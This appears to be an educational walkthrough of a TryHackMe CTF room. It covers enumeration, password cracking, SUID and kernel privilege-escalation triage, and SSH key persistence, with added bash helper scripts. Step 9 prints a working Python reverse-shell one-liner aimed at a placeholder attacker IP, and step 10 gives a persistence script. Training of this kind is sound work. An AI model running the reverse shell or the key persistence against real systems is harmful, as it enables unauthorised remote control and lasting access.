
Introduction:
Penetration testing is a critical component of modern cybersecurity defense, allowing professionals to proactively identify and remediate vulnerabilities. TryHackMe’s “Basic Pentesting” Capture The Flag (CTF) challenge serves as an ideal training ground for developing these offensive security skills in a legal, educational environment, providing hands-on experience with common attack vectors and privilege escalation techniques.
Learning Objectives:
- Understand the fundamental methodology of a penetration test from reconnaissance to exploitation
- Master common Linux privilege escalation techniques and service enumeration
- Develop practical skills with essential cybersecurity tools like Nmap, John the Ripper, and Metasploit
You Should Know:
1. Network Reconnaissance with Nmap
`nmap -sC -sV -O -A <target-ip>`
Step-by-step guide: This Nmap command performs a comprehensive scan of the target machine (the `<target-ip>` placeholder stands for the machine's address). The `-sC` flag runs the default NSE scripts, `-sV` probes service versions, `-O` attempts OS fingerprinting, and `-A` turns all three on together with a traceroute, so listing them separately is redundant but harmless. OS detection needs raw sockets, so run the scan as root or via `sudo`. By default only the 1,000 most common TCP ports are scanned; add `-p-` if you want every port. This initial reconnaissance identifies open ports (commonly 22/SSH, 80/HTTP, 139/445/SMB), running services and versions, and the attack surface the remaining steps enumerate.
2. SMB Enumeration for Network Shares
`smbclient -L //<target-ip> -N`
Step-by-step guide: This command lists the SMB shares exposed by the target without supplying a password (`-N` asks for a null session). If anonymous access is allowed, you can then connect to a specific share with `smbclient //<target-ip>/<share> -N` and use `ls` and `get` to browse and retrieve files. Shares that allow anonymous reads frequently leak usernames, notes, or configuration files that feed the later steps.
3. Web Directory Bruteforcing with Gobuster
`gobuster dir -u http://<target-ip> -w <wordlist> -x <extensions>`
Step-by-step guide: This Gobuster command brute-forces web directories and files using a wordlist. The `-u` flag specifies the URL, `-w` the wordlist path (on Kali, the `dirb` and `dirbuster` lists under `/usr/share/wordlists/` are the usual choice), and `-x` a comma-separated list of file extensions to try as well, for example `php,txt,html`. Hidden directories like `/admin`, `/backup`, or `/development` often contain sensitive information or login portals.
4. HTTP Enumeration with Curl
`curl -s http://<target-ip>/<directory>`
Step-by-step guide: This command fetches the raw HTML of a discovered hidden directory. The `-s` flag silences the progress meter and other noise; pipe the output through a converter such as `html2text` if you prefer rendered text. Reading the source directly, rather than a browser's rendering, exposes HTML comments, hidden form fields, and other information that never appears on screen.
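The four enumeration steps above are normally driven by what the port scan returns. The script below is an added example, not code from the original write-up: it parses Nmap's grepable output (`nmap -oG`) to list the open TCP ports and then emits the matching follow-up commands from this walkthrough for each service. The scan output, the `10.10.10.10` address, and the `WORDLIST` path (a Kali default) are constructed placeholders; nothing is executed against a host, the plan is printed for review and can be piped into `sh` once you have checked it.

```bash
#!/usr/bin/env bash
# Added example: turn nmap grepable output into a follow-up enumeration plan.

# Constructed sample of `nmap -sV -oG -` output for a lab host. It is NOT real
# scan data; the IP, ports and version strings are placeholders.
SAMPLE_GNMAP='# Nmap 7.94 scan initiated as: nmap -sV -oG - 10.10.10.10
Host: 10.10.10.10 ()  Status: Up
Host: 10.10.10.10 ()  Ports: 22/open/tcp//ssh//OpenSSH 7.2p2/, 80/open/tcp//http//Apache httpd 2.4.18/, 139/open/tcp//netbios-ssn//Samba smbd 3.X - 4.X/, 445/open/tcp//netbios-ssn//Samba smbd 4.3.11/, 8009/closed/tcp//ajp13///  Ignored State: closed (995)
# Nmap done'

# Assumed Kali default; adjust for your own wordlist collection.
WORDLIST=${WORDLIST:-/usr/share/wordlists/dirb/common.txt}

# stdin: -oG output. Prints "port service" for every open TCP port.
# Each entry in the Ports: field looks like  22/open/tcp//ssh//OpenSSH 7.2p2/
# so splitting on "/" gives port, state, protocol, (owner), service, (rpc), version.
open_ports() {
    grep 'Ports:' \
    | sed 's/.*Ports: //; s/[[:space:]]*Ignored State.*//' \
    | tr ',' '\n' \
    | sed 's/^[[:space:]]*//' \
    | awk -F/ '$2 == "open" && $3 == "tcp" { print $1, $5 }'
}

# stdin: "port service" lines from open_ports. $1: target IP.
# Emits the enumeration commands this walkthrough uses for each service,
# deduplicated (139 and 445 both map to SMB) and in discovery order.
followups() {
    local target="$1" port service
    while read -r port service; do
        case "$port" in
            22)
                printf '# port %s (%s): ssh <user>@%s once credentials are found\n' "$port" "$service" "$target" ;;
            80|8080|8000)
                printf 'curl -s http://%s:%s/\n' "$target" "$port"
                printf 'gobuster dir -u http://%s:%s -w %s -x php,txt,html\n' "$target" "$port" "$WORDLIST" ;;
            139|445)
                printf 'smbclient -L //%s -N\n' "$target"
                printf 'nmap -p %s --script smb-enum-shares,smb-enum-users %s\n' "$port" "$target" ;;
            *)
                printf '# port %s (%s): no canned step, review manually\n' "$port" "$service" ;;
        esac
    done | awk '!seen[$0]++'
}

# Stand-alone demo on the constructed sample. Real use:
#   nmap -sV -oG scan.gnmap <target-ip>; open_ports < scan.gnmap | followups <target-ip>
printf '%s\n' "$SAMPLE_GNMAP" | open_ports | followups 10.10.10.10
```

Grepable output is a stable, line-oriented format, which is why it is easier to script than the human-readable default; `-oA <basename>` writes it alongside the normal and XML reports so the same scan can feed both your notes and this kind of triage.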
5. Password Cracking with John the Ripper
`john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt`
Step-by-step guide: After obtaining password hashes (often from `/etc/shadow` or database dumps), this John the Ripper command attempts to crack them using the rockyou.txt wordlist. Hashes from `/etc/shadow` should first be combined with `/etc/passwd` via `unshadow passwd shadow > hashes.txt` so John sees the usernames; once a run finishes, `john --show hashes.txt` prints the recovered credentials. Always ensure you have proper authorization before cracking passwords, even in lab environments.
6. SSH Login with Discovered Credentials
`ssh <username>@<target-ip>`
Step-by-step guide: Once valid credentials are obtained through enumeration or cracking, this command establishes an SSH connection to the target machine. Successful login provides an initial foothold on the system, from which you can begin local enumeration and privilege escalation.
7. Privilege Escalation via SUID Binaries
`find / -perm -u=s -type f 2>/dev/null`
Step-by-step guide: This command searches for SUID (Set User ID) binaries, which execute with the permissions of their owner rather than of the user who runs them; `2>/dev/null` hides the permission-denied noise from directories you cannot read. Stock installs legitimately ship a handful of SUID programs (`passwd`, `sudo`, `su`, `mount`), so the useful signal is anything beyond that baseline. Unusual SUID binaries such as `bash`, `find`, `nmap`, or `vim` can provide privilege escalation paths through well-documented techniques (the GTFOBins project catalogues them).
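The raw `find` output is long, and the entries that matter are the ones a clean install would not have. The script below is an added example, not code from the original page: it diffs the SUID list against a baseline and then flags the names known to yield a root shell or root file access when SUID. The baseline and the sample `find` output are constructed for illustration; build the real baseline from a clean install of the same distribution and release as the target, because the legitimate set varies between releases.

```bash
#!/usr/bin/env bash
# Added example: triage SUID binaries against a baseline instead of eyeballing raw find output.

# Constructed, illustrative baseline of SUID binaries that are normal on a
# Debian/Ubuntu-style host. Regenerate it from a clean install of the target's release.
BASELINE_SUID='/usr/bin/passwd
/usr/bin/sudo
/usr/bin/su
/usr/bin/mount
/usr/bin/umount
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper'

# Program names that give a root shell or root file read/write when SUID
# (a subset of the well-known GTFOBins entries).
INTERESTING_SUID='bash sh dash find nmap vim vi python python3 perl env less more awk cp mv tee'

# The walkthrough's search, wrapped so the rest of the pipeline can consume it.
list_suid() { find / -perm -u=s -type f 2>/dev/null; }

# stdin: SUID paths, one per line. Prints those absent from the baseline.
unexpected_suid() {
    local path
    while IFS= read -r path; do
        [ -n "$path" ] || continue
        printf '%s\n' "$BASELINE_SUID" | grep -qxF -- "$path" || printf '%s\n' "$path"
    done
}

# stdin: SUID paths. Prints those whose basename is a known escalation primitive.
# Matching is on the exact basename, so e.g. /usr/bin/vim.basic is NOT caught;
# extend INTERESTING_SUID or resolve symlinks first if your target uses such names.
flag_interesting() {
    local path name i
    while IFS= read -r path; do
        name=${path##*/}
        for i in $INTERESTING_SUID; do
            if [ "$name" = "$i" ]; then printf '%s\n' "$path"; break; fi
        done
    done
}

# Constructed sample of what list_suid might return on a lab box (not real output).
SAMPLE_FOUND='/usr/bin/passwd
/usr/bin/sudo
/usr/bin/find
/usr/bin/nmap
/usr/local/bin/backup'

# Stand-alone demo. On a real target:
#   list_suid | unexpected_suid | tee suid-unexpected.txt | flag_interesting
printf '%s\n' "$SAMPLE_FOUND" | unexpected_suid | flag_interesting
```

In the sample, `/usr/local/bin/backup` is reported as unexpected but not as a known primitive; that is exactly the kind of custom binary worth inspecting by hand (`strings`, `ltrace`, or reading it if it is a script), since home-grown SUID helpers are a common CTF escalation path.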
8. Linux Kernel Exploit Research
`uname -a`
Step-by-step guide: This command displays the kernel version and system architecture. With this data, you can search exploit databases like Exploit-DB for known privilege escalation exploits specific to the kernel version, such as Dirty Pipe or Dirty COW. Two caveats apply: distributions backport fixes without changing the upstream version number, so cross-check `cat /etc/os-release` and the distro's package changelog before trusting a version match, and kernel exploits can crash the machine, so treat them as a last resort after the SUID and misconfiguration checks.
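The version string from `uname -r` is only a first filter, but it is a filter worth automating so the comparison is done correctly rather than by eye. The helper below is an added example, not part of the original page: it strips the distro suffix from a kernel release string and checks it against the upstream fix versions of the two exploits named above, Dirty COW (CVE-2016-5195, fixed in mainline 4.8.3 and in the 4.4.26 and 4.7.9 stable releases) and Dirty Pipe (CVE-2022-0847, introduced in 5.8 and fixed in 5.16.11, 5.15.25 and 5.10.102). Those thresholds are upstream facts; the limitation is that distributions backport fixes under their own numbering (Ubuntu's 4.4.0-NN series, for instance, was patched for Dirty COW without the upstream version changing), so a hit here means "check the distro changelog", not "exploit will work".

```bash
#!/usr/bin/env bash
# Added example: triage a kernel release string against upstream fix versions.
# Only a hint: distro backports make the version number alone unreliable.

# "5.4.0-100-generic" -> "5.4.0" (drop everything from the first non-numeric char).
kernel_base() { printf '%s\n' "$1" | sed 's/[^0-9.].*//'; }

# True (exit 0) when dotted version $1 is strictly lower than $2. Missing
# components count as 0, so 5.8 and 5.8.0 compare equal.
ver_lt() {
    awk -v a="$1" -v b="$2" 'BEGIN {
        n = split(a, x, "."); m = split(b, y, ".")
        for (i = 1; i <= 3; i++) {
            xi = (i <= n) ? x[i] + 0 : 0
            yi = (i <= m) ? y[i] + 0 : 0
            if (xi < yi) exit 0
            if (xi > yi) exit 1
        }
        exit 1
    }'
}

# Prints the names of candidate bugs for a uname -r string, or "none".
kernel_triage() {
    local v out=""
    v=$(kernel_base "$1")

    # Dirty COW (CVE-2016-5195): fixed in 4.8.3 mainline, 4.7.9 and 4.4.26 stable.
    case "$v" in
        4.4.*) ver_lt "$v" 4.4.26 && out="$out dirtycow" ;;
        4.7.*) ver_lt "$v" 4.7.9  && out="$out dirtycow" ;;
        *)     ver_lt "$v" 4.8.3  && out="$out dirtycow" ;;
    esac

    # Dirty Pipe (CVE-2022-0847): present from 5.8, fixed in 5.16.11 / 5.15.25 / 5.10.102.
    if ! ver_lt "$v" 5.8; then
        case "$v" in
            5.10.*) ver_lt "$v" 5.10.102 && out="$out dirtypipe" ;;
            5.15.*) ver_lt "$v" 5.15.25  && out="$out dirtypipe" ;;
            *)      ver_lt "$v" 5.16.11  && out="$out dirtypipe" ;;
        esac
    fi

    out=${out# }
    printf '%s\n' "${out:-none}"
}

# Stand-alone demo on the running host plus a few constructed release strings.
printf '%-24s %s\n' "$(uname -r)" "$(kernel_triage "$(uname -r)")"
for r in 4.4.0-21-generic 5.10.100-amd64 5.15.25-generic 6.1.0; do
    printf '%-24s %s\n' "$r" "$(kernel_triage "$r")"
done
```

Pair the output with `cat /etc/os-release` and the distribution's security tracker before spending time on a kernel exploit; on a shared lab box a failed attempt can take the machine down for everyone.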
9. Python Reverse Shell Establishment
`python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<attacker-ip>",<port>));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'`
Step-by-step guide: This Python one-liner creates a reverse shell connection back to your attack machine: it opens a TCP socket to `<attacker-ip>:<port>`, duplicates the socket onto stdin, stdout and stderr with `os.dup2`, and then runs an interactive `/bin/sh` whose I/O is the socket. Set up a listener first with `nc -nlvp <port>` on your attack machine, then run the one-liner on the target. Use `python3` if the target has no `python` binary; the code runs unchanged under either version.
10. Persistence via SSH Key Injection
`echo "ssh-rsa YOUR_PUBLIC_KEY" >> ~/.ssh/authorized_keys`
Step-by-step guide: After gaining access, this command adds your public SSH key to the authorized_keys file, enabling password-less SSH login for persistent access to the compromised system. If `~/.ssh` does not exist yet, create it first with `mkdir -p ~/.ssh && chmod 700 ~/.ssh` and set `chmod 600 ~/.ssh/authorized_keys` afterwards; with the default `StrictModes yes`, sshd silently ignores the file when the directory or file is group- or world-writable. Ensure you remove the key after completing the CTF to maintain lab integrity.
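The one-line `echo >> authorized_keys` works only when the directory and file already exist with the modes sshd accepts, and it appends a duplicate every time it is run. The script below is an added example, not code from the original page: it installs a key the way sshd's `StrictModes` requires (700 directory, 600 file), skips the append if the exact line is already present, and provides the matching removal step for the post-CTF cleanup the text asks for. The `PUBKEY` value is a constructed placeholder, not a usable key; the demo runs against a throwaway directory so it never touches the real `~/.ssh`.

```bash
#!/usr/bin/env bash
# Added example: idempotent SSH key persistence with correct modes, plus cleanup.

# Constructed placeholder key; replace with the contents of your own id_ed25519.pub.
# The trailing comment tags the line so it is easy to spot and remove later.
PUBKEY='ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPLACEHOLDERPLACEHOLDERPLACEHOLDERPLACEHOLDER ctf-persistence'

# Append key $1 to authorized_keys under home dir $2 (default $HOME).
# Creates ~/.ssh as 700 and the file as 600, and never adds a duplicate line.
install_key() {
    local key="$1" home="${2:-$HOME}" dir
    dir="$home/.ssh"
    mkdir -p "$dir" && chmod 700 "$dir"
    [ -f "$dir/authorized_keys" ] || : > "$dir/authorized_keys"
    chmod 600 "$dir/authorized_keys"
    grep -qxF -- "$key" "$dir/authorized_keys" || printf '%s\n' "$key" >> "$dir/authorized_keys"
}

# Remove every line equal to $1 from authorized_keys under $2, rewriting the
# file in place so its owner and mode are preserved.
remove_key() {
    local key="$1" home="${2:-$HOME}" f tmp
    f="$home/.ssh/authorized_keys"
    [ -f "$f" ] || return 0
    tmp=$(mktemp)
    grep -vxF -- "$key" "$f" > "$tmp" || true   # grep exits 1 when nothing is left
    cat "$tmp" > "$f"
    rm -f "$tmp"
}

# Exit 0 when ~/.ssh is exactly 700 and authorized_keys exactly 600 (what
# sshd's default StrictModes yes effectively demands before it trusts the file).
perms_ok() {
    local dir="${1:-$HOME}/.ssh"
    [ -n "$(find "$dir" -maxdepth 0 -perm 700 2>/dev/null)" ] &&
    [ -n "$(find "$dir/authorized_keys" -maxdepth 0 -perm 600 2>/dev/null)" ]
}

# Number of non-empty lines (keys) currently installed under home dir $1.
key_count() {
    local f="${1:-$HOME}/.ssh/authorized_keys"
    if [ -f "$f" ]; then grep -c . "$f" || true; else echo 0; fi
}

# Stand-alone demo in a temporary home directory.
demo_home=$(mktemp -d)
install_key "$PUBKEY" "$demo_home"
install_key "$PUBKEY" "$demo_home"          # second call is a no-op
printf 'installed keys: %s, perms ok: %s\n' "$(key_count "$demo_home")" "$(perms_ok "$demo_home" && echo yes || echo no)"
remove_key "$PUBKEY" "$demo_home"
printf 'after cleanup: %s keys\n' "$(key_count "$demo_home")"
rm -rf "$demo_home"
```

Run `install_key "$PUBKEY"` on the target as the user you landed as; when the room is finished, `remove_key "$PUBKEY"` with the same key string takes the entry out again without disturbing any keys that were already there.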
What Undercode Say:
- Methodical enumeration consistently outperforms rushed exploitation in penetration testing
- Documentation throughout the process creates valuable learning artifacts and improves repeatability
- Understanding why vulnerabilities exist provides deeper security insight than simply exploiting them
The Basic Pentesting CTF exemplifies how structured learning environments bridge theoretical knowledge and practical skills. Each step—from initial reconnaissance to final privilege escalation—reinforces the systematic approach required for professional penetration testing. The true value lies not in reaching the root flag, but in understanding the vulnerability chain that made the compromise possible. This mindset shift from “hacking” to “methodical testing” separates recreational CTF players from professional security practitioners.
Prediction:
As offensive security training becomes more accessible through platforms like TryHackMe, we’ll see a significant elevation in entry-level cybersecurity professionals’ practical skills. However, this also means defenders must enhance their monitoring capabilities for these common attack techniques. The future of penetration testing will increasingly incorporate AI-assisted vulnerability discovery and exploitation, making foundational exercises like Basic Pentesting even more critical for understanding the core principles before relying on automated tools.
Reported By: Michael Tchuindjang – Hackers Feeds